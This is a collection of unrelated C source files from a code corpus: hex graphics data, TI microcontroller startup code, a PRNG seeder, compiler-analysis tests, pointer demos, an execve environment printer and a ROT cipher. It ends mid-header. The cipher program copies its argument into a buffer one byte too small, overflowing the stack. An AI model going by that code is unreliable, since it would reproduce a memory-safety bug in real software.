{0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xD9,0xEC,0x2A,0x55,0xC0,0xFF,0x03,0x50,0xFF,0xE0,0x14,0xAA,0xFF,0x80,0xFF,0xA8,}, {0xF0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x55,0x20,0x04,0x02,0x54,0x22,0x55,0x55,0xAA,0x54,0x22,0x54,0x22,0x54,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x55,0xAA,0x45,0x20,0x45,0x08,0x45,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0x55,0xAA,0x55,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x55,0x2A,0x55,0x2A,0x55,0xAA,0x55,0x55,0x2A,0x55,0x2A,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x55,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x55,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x00,0x00,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x00,0x00,0x15,0x2A,0x15,0x2A,0x15,0x2A,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x07,0x07,0x03,0xF3,0x01,0xF9,0xA8,0x54,0x07,0x07,0xF3,0x03,0xF9,0x01,0x54,0xA8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x54,0x01,0xFD,0x03,0xFB,0x07,0x07,0x54,0xAA,0xFD,0x01,0xFB,0x03,0xF7,0x07,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x00,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x2A,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x00,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0x55,0xAA,0x00,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x2A,0x55,0x2A,0x55,0x2A,0x55,0xAA,0x00,0x55,0x2A,0x55,0x2A,0x55,0xAA,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x00,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x2A,0x55,0x2A,0x55,0x2A,0x55,0x2A,0x00,0x55,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xFE,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFE,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x7F,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xFE,0xFE,0xFE,0xFE,0xFE,0xFF,0xFF,0xFF,0xFE,0xFE,0xFE,0xFE,0xFE,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x7F,0x7F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,0x7F,0x7F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x00,0x00,0x2A,0x14,0x2A,0x15,0x2A,0x15,0x00,0x00,0x14,0x2A,0x14,0x2A,0x15,0x2A,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x07,0x07,0x03,0x73,0x01,0xF9,0xA8,0x54,0x07,0x07,0x73,0x03,0x79,0x01,0x54,0xA8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x14,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x18,0x04,0x0A,0x14,0xAA,0x54,0xAA,0x54,0x80,0x02,0x14,0x2A,0x54,0xAA,0x54,0xAA,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x30,0x41,0x20,0x51,0x2A,0x55,0x2A,0x55,0x01,0x00,0x51,0x28,0x55,0x2A,0x55,0x2A,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xA8,0xF0,0x07,0xC0,0x18,0x04,0x0A,0x14,0x50,0x03,0xE0,0x0F,0x80,0x02,0x14,0x2A,}, {0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,}}, {{0x0A,0x0F,0xC0,0x83,0x30,0x41,0x20,0x51,0x15,0x80,0x07,0xE0,0x01,0x00,0x51,0x28,}, {0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xA8,0xF0,0x07,0xC0,0x55,0xAA,0x55,0xAA,0x50,0x03,0xE0,0x0F,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,}}, {{0xAA,0x55,0xAA,0x55,0x0A,0x0F,0xC0,0x83,0x55,0xAA,0x55,0xAA,0x15,0x80,0x07,0xE0,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,}}, {{0x2A,0x14,0x2A,0x14,0x2A,0x15,0x2A,0x15,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x15,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x54,0x2A,0x55,0x2A,0x55,0xAA,0x55,0x54,0x2A,0x55,0x2A,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x00,0x14,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x2A,0x54,0x01,0xFD,0x03,0xFB,0x07,0x07,0x54,0xAA,0xFD,0x01,0xFB,0x03,0xF7,0x07,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x2A,0x14,0x2A,0x14,0x2A,0x15,0x2A,0x00,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x15,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x2A,0x54,0x01,0x7D,0x03,0xFB,0x07,0x07,0x54,0x2A,0x7D,0x01,0x7B,0x03,0xF7,0x07,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x54,0xAA,0x54,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x55,0x2A,0x55,0xAA,0x55,0xAA,0x55,0x55,0x2A,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x54,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x54,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x18,0x04,0x0A,0x14,0xAA,0x54,0xAA,0x00,0x80,0x02,0x14,0x2A,0x54,0xAA,0x54,0x00,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x30,0x41,0x20,0x51,0x2A,0x55,0x2A,0x00,0x01,0x00,0x51,0x28,0x55,0x2A,0x55,0x00,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xA8,0xF0,0x07,0xC0,0x18,0x04,0x0A,0x00,0x50,0x03,0xE0,0x0F,0x80,0x02,0x14,0x00,}, {0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0x20,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0x20,}}, {{0x0A,0x0F,0xC0,0x83,0x30,0x41,0x20,0x00,0x15,0x80,0x07,0xE0,0x01,0x00,0x51,0x00,}, {0xE0,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0x20,0xE0,0xB0,0xE0,0xB0,0xE0,0xE0,0xE0,0x20,}}, {{0xAA,0x55,0xAA,0x55,0xA8,0xF0,0x07,0x05,0x55,0xAA,0x55,0xAA,0x50,0x03,0xE0,0x0A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,}}, {{0xAA,0x55,0xAA,0x55,0x0A,0x0F,0xC0,0xC0,0x55,0xAA,0x55,0xAA,0x15,0x80,0x07,0xA0,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,}}, {{0x80,0x06,0x1E,0x3E,0xFE,0xFE,0xFE,0xFE,0x98,0x06,0x1E,0x3E,0xFE,0xFE,0xFE,0xFE,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xB0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x01,0x41,0x71,0x79,0x7F,0x7F,0x7F,0x7F,0x31,0x41,0x71,0x79,0x7F,0x7F,0x7F,0x7F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xB0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xF8,0xF3,0xE0,0xCF,0x80,0x06,0x1E,0x3E,0xF8,0xF0,0xE7,0xC0,0x98,0x06,0x1E,0x3E,}, {0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xF0,}}, {{0x1F,0x8F,0x07,0xE3,0x01,0x41,0x71,0x79,0x1F,0x0F,0xC7,0x83,0x31,0x41,0x71,0x79,}, {0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xF0,}}, {{0xFF,0xFF,0xFF,0xFF,0xF8,0xF3,0xE0,0xCF,0xFF,0xFF,0xFF,0xFF,0xF8,0xF0,0xE7,0xC0,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xB0,0xF0,0xB0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xB0,0xF0,}}, {{0x08,0x00,0x0A,0x14,0x2A,0x14,0x2A,0x14,0x10,0x00,0x14,0x2A,0x14,0x2A,0x14,0x2A,}, {0xB0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xFF,0xFF,0xFF,0xFF,0x1F,0x8F,0x07,0xE3,0xFF,0xFF,0xFF,0xFF,0x1F,0x0F,0xC7,0x83,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xB0,0xF0,0xB0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xB0,0xF0,}}, {{0x01,0x01,0x01,0x71,0x01,0x79,0x28,0x54,0x31,0x01,0x71,0x01,0x79,0x01,0x54,0x28,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xB0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0x00,0x01,0x07,0x05,0x08,0x04,0x0A,0x14,0x00,0x02,0x20,0x0A,0x10,0x02,0x14,0x2A,}, {0x20,0xB0,0xB0,0xB0,0xB0,0xE0,0xE0,0xE0,0x20,0xB0,0xE0,0xB0,0xB0,0xE0,0xE0,0xE0,}}, {{0x07,0x87,0x03,0xE3,0x01,0x41,0x20,0x50,0x07,0x07,0xC3,0x83,0x31,0x01,0x50,0x28,}, {0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xB0,0xF0,0xB0,0xF0,0xE0,0xE0,}}, {{0x00,0x00,0xAA,0x54,0xAA,0x55,0xAA,0x55,0x00,0x00,0x54,0xAA,0x54,0xAA,0x55,0xAA,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x00,0x00,0x2A,0x55,0x2A,0x55,0xAA,0x55,0x00,0x00,0x55,0x2A,0x55,0xAA,0x55,0xAA,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, };
the_stack_data/140765159.c
//***************************************************************************** // // startup_gcc.c - Startup code for use with GNU tools. // // Copyright (c) 2007-2013 Texas Instruments Incorporated. All rights reserved. // Software License Agreement // // Texas Instruments (TI) is supplying this software for use solely and // exclusively on TI's microcontroller products. The software is owned by // TI and/or its suppliers, and is protected under applicable copyright // laws. You may not combine this software with "viral" open-source // software in order to form a larger program. // // THIS SOFTWARE IS PROVIDED "AS IS" AND WITH ALL FAULTS. // NO WARRANTIES, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT // NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE APPLY TO THIS SOFTWARE. TI SHALL NOT, UNDER ANY // CIRCUMSTANCES, BE LIABLE FOR SPECIAL, INCIDENTAL, OR CONSEQUENTIAL // DAMAGES, FOR ANY REASON WHATSOEVER. // // This is part of revision 10636 of the EK-LM3S8962 Firmware Package. // //***************************************************************************** //***************************************************************************** // // Forward declaration of the default fault handlers. // //***************************************************************************** void ResetISR(void); static void NmiSR(void); static void FaultISR(void); static void IntDefaultHandler(void); //***************************************************************************** // // External declarations for the interrupt handlers used by the application. // //***************************************************************************** extern void CANHandler(void); extern void lwIPEthernetIntHandler(void); extern void SysTickIntHandler(void); //***************************************************************************** // // The entry point for the application. // //***************************************************************************** extern int main(void); //***************************************************************************** // // Reserve space for the system stack. // //***************************************************************************** static unsigned long pulStack[256]; //***************************************************************************** // // The vector table. Note that the proper constructs must be placed on this to // ensure that it ends up at physical address 0x0000.0000. // //***************************************************************************** __attribute__ ((section(".isr_vector"))) void (* const g_pfnVectors[])(void) = { (void (*)(void))((unsigned long)pulStack + sizeof(pulStack)), // The initial stack pointer ResetISR, // The reset handler NmiSR, // The NMI handler FaultISR, // The hard fault handler IntDefaultHandler, // The MPU fault handler IntDefaultHandler, // The bus fault handler IntDefaultHandler, // The usage fault handler 0, // Reserved 0, // Reserved 0, // Reserved 0, // Reserved IntDefaultHandler, // SVCall handler IntDefaultHandler, // Debug monitor handler 0, // Reserved IntDefaultHandler, // The PendSV handler SysTickIntHandler, // The SysTick handler IntDefaultHandler, // GPIO Port A IntDefaultHandler, // GPIO Port B IntDefaultHandler, // GPIO Port C IntDefaultHandler, // GPIO Port D IntDefaultHandler, // GPIO Port E IntDefaultHandler, // UART0 Rx and Tx IntDefaultHandler, // UART1 Rx and Tx IntDefaultHandler, // SSI0 Rx and Tx IntDefaultHandler, // I2C0 Master and Slave IntDefaultHandler, // PWM Fault IntDefaultHandler, // PWM Generator 0 IntDefaultHandler, // PWM Generator 1 IntDefaultHandler, // PWM Generator 2 IntDefaultHandler, // Quadrature Encoder 0 IntDefaultHandler, // ADC Sequence 0 IntDefaultHandler, // ADC Sequence 1 IntDefaultHandler, // ADC Sequence 2 IntDefaultHandler, // ADC Sequence 3 IntDefaultHandler, // Watchdog timer IntDefaultHandler, // Timer 0 subtimer A IntDefaultHandler, // Timer 0 subtimer B IntDefaultHandler, // Timer 1 subtimer A IntDefaultHandler, // Timer 1 subtimer B IntDefaultHandler, // Timer 2 subtimer A IntDefaultHandler, // Timer 2 subtimer B IntDefaultHandler, // Analog Comparator 0 IntDefaultHandler, // Analog Comparator 1 IntDefaultHandler, // Analog Comparator 2 IntDefaultHandler, // System Control (PLL, OSC, BO) IntDefaultHandler, // FLASH Control IntDefaultHandler, // GPIO Port F IntDefaultHandler, // GPIO Port G IntDefaultHandler, // GPIO Port H IntDefaultHandler, // UART2 Rx and Tx IntDefaultHandler, // SSI1 Rx and Tx IntDefaultHandler, // Timer 3 subtimer A IntDefaultHandler, // Timer 3 subtimer B IntDefaultHandler, // I2C1 Master and Slave IntDefaultHandler, // Quadrature Encoder 1 CANHandler, // CAN0 IntDefaultHandler, // CAN1 IntDefaultHandler, // CAN2 lwIPEthernetIntHandler, // Ethernet IntDefaultHandler // Hibernate }; //***************************************************************************** // // The following are constructs created by the linker, indicating where the // the "data" and "bss" segments reside in memory. The initializers for the // for the "data" segment resides immediately following the "text" segment. // //***************************************************************************** extern unsigned long _etext; extern unsigned long _data; extern unsigned long _edata; extern unsigned long _bss; extern unsigned long _ebss; //***************************************************************************** // // This is the code that gets called when the processor first starts execution // following a reset event. Only the absolutely necessary set is performed, // after which the application supplied entry() routine is called. Any fancy // actions (such as making decisions based on the reset cause register, and // resetting the bits in that register) are left solely in the hands of the // application. // //***************************************************************************** void ResetISR(void) { unsigned long *pulSrc, *pulDest; // // Copy the data segment initializers from flash to SRAM. // pulSrc = &_etext; for(pulDest = &_data; pulDest < &_edata; ) { *pulDest++ = *pulSrc++; } // // Zero fill the bss segment. // __asm(" ldr r0, =_bss\n" " ldr r1, =_ebss\n" " mov r2, #0\n" " .thumb_func\n" "zero_loop:\n" " cmp r0, r1\n" " it lt\n" " strlt r2, [r0], #4\n" " blt zero_loop"); // // Call the application's entry point. // main(); } //***************************************************************************** // // This is the code that gets called when the processor receives a NMI. This // simply enters an infinite loop, preserving the system state for examination // by a debugger. // //***************************************************************************** static void NmiSR(void) { // // Enter an infinite loop. // while(1) { } } //***************************************************************************** // // This is the code that gets called when the processor receives a fault // interrupt. This simply enters an infinite loop, preserving the system state // for examination by a debugger. // //***************************************************************************** static void FaultISR(void) { // // Enter an infinite loop. // while(1) { } } //***************************************************************************** // // This is the code that gets called when the processor receives an unexpected // interrupt. This simply enters an infinite loop, preserving the system state // for examination by a debugger. // //***************************************************************************** static void IntDefaultHandler(void) { // // Go into an infinite loop. // while(1) { } }
the_stack_data/97013016.c
/* * xoroshiro128_plus functions have the following copyright: * * Written in 2016-2018 by David Blackman and Sebastiano Vigna ([email protected]) * To the extent possible under law, the author has dedicated all copyright * and related and neighboring rights to this software to the public domain * worldwide. This software is distributed without any warranty. * See <http://creativecommons.org/publicdomain/zero/1.0/>. */ #include <stdint.h> void xoroshiro128plus_init(uint64_t *s, uint64_t seed) { uint64_t z; z = (seed += UINT64_C(0x9E3779B97F4A7C15)); z = (z ^ (z >> 30)) * UINT64_C(0xBF58476D1CE4E5B9); z = (z ^ (z >> 27)) * UINT64_C(0x94D049BB133111EB); s[0] = z ^ (z >> 31); z = (seed += UINT64_C(0x9E3779B97F4A7C15)); z = (z ^ (z >> 30)) * UINT64_C(0xBF58476D1CE4E5B9); z = (z ^ (z >> 27)) * UINT64_C(0x94D049BB133111EB); s[1] = z ^ (z >> 31); }
the_stack_data/159516078.c
int foo(){ return 2345; } int main(){ int i = 0; if(2 > 3) { #pragma spf transform inline i = foo(); } return 0; }
the_stack_data/98891.c
#include <stdio.h> #include <stdlib.h> int* hello(int* a, int* b) { int* c = (int*)malloc(sizeof(int)); *c = *a + *b; printf("c: %d / 0x%08x\n", *c, c); return c; } // used as parameters | result struct pr { int val; }; struct pr* p_hello(struct pr* a, struct pr* b) { struct pr* c = (struct pr*)malloc(sizeof(struct pr)); c->val = a->val + b->val; printf("pr: 0x%08x\n", c); return c; } int main() { // base type int a = 1, b = 2; int *input1 = &a, *input2 = &b; int* res = hello(input1, input2); // arr is on stack, while res is on heap int arr[1000] = { 0 }; printf("arr: 0x%08x\n", arr); printf("res: %d / 0x%08x\n", *res, res); // struct type struct pr p_a, p_b; p_a.val = 1; p_b.val = 2; struct pr *p_input1 = &p_a, *p_input2 = &p_b; struct pr* p_res = p_hello(p_input1, p_input2); // arr1 is on stack, while res is on heap int arr1[1000] = { 0 }; printf("arr1: 0x%08x\n", arr1); printf("p_res: %d / 0x%08x\n", *p_res, p_res); }
the_stack_data/118224.c
extern void main(); extern int _ram_start; extern int _stack_top; extern int _init_data_start; extern int _data_start; extern int _data_end; void __attribute__((weak)) main() {} void _start() { int* ram; for (ram = &_ram_start; ram < &_stack_top; ram++) *ram = 0; int* rom = &_init_data_start; for (ram = &_data_start; ram < &_data_end; ram++) *ram = *rom++; main(); _start(); }
the_stack_data/10795.c
/* Copyright (c) 2012, Broadcom Europe Ltd All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ // Classic Hello World #include <stdio.h> int main(void) { printf("Hello world!\n"); return 0; }
the_stack_data/82951569.c
#include <stdio.h> #include <stdlib.h> #include <unistd.h> extern char ** environ; int main() { char * argv[2]; printf("Environment variables for execve:\n"); argv[0] = "/usr/bin/env"; argv[1] = NULL; execve("/usr/bin/env", argv, NULL); return 0 ; }
the_stack_data/29217.c
#include <stdio.h> #include <stdlib.h> #include <string.h> //How to compile: gcc -o cypher rot1-25.c void fatal(int argc){ fprintf(stderr, "USE MODE\t./cypher STRING\n"); if(argc > 2) fprintf(stderr, "QUOTATION MARKS: ./cypher \"STRING1 STRING 2 ...\"\n"); exit(3); } int main(int argc, char *argv[]){ if(argc != 2) fatal(argc); char str[strlen(argv[1])]; strcpy(str, argv[1]); for(int k = 0; k < 25; k++){ printf("%d\t", k + 1); for(int i = 0; str[i] != '\0'; i++){ if(str[i] < 65 || str[i] > 122){ continue; } if(str[i] == 32) i++; if(str[i] == 122) str[i] = 97; else if(str[i] == 90) str[i] = 65; else str[i] += 1; } printf("%s\n", str); } return 0; }
the_stack_data/14199190.c
// This example illustrates that a while-if structure may lead to less // precise results than a while-while structure. // If run with PIPS r19837, the error function appears to be reachable in // whilewhile but not in whileif. // $Id$ #include <stdlib.h> void error(void) { exit(1); } void whileif(void) { int x, y; x = y = 0; while (x <= 58) { if (y <= 8) { x++; y++; if (6 * y > x + 50) error(); } else { x++; if (6 * y > x + 50) error(); } } } void whilewhile(void) { int x, y; x = y = 0; while (x <= 58) { while (x <= 58 && y <= 8) { x++; y++; if (6 * y > x + 50) error(); } while (x <= 58 && y > 8) { x++; if (6 * y > x + 50) error(); } } } int main(void) { whileif(); whilewhile(); return 0; }
the_stack_data/1231116.c
/* * POK header * * The following file is a part of the POK project. Any modification should * made according to the POK licence. You CANNOT use this file or a part of * this file is this part of a file for your own project * * For more information on the POK licence, please see our LICENCE FILE * * Please follow the coding guidelines described in doc/CODING_GUIDELINES * * Copyright (c) 2007-2009 POK team * * Created by julien on Fri Jan 30 14:41:34 2009 */ /* s_isnanf.c -- float version of s_isnan.c. * Conversion to float by Ian Lance Taylor, Cygnus Support, [email protected]. */ /* * ==================================================== * Copyright (C) 1993 by Sun Microsystems, Inc. All rights reserved. * * Developed at SunPro, a Sun Microsystems, 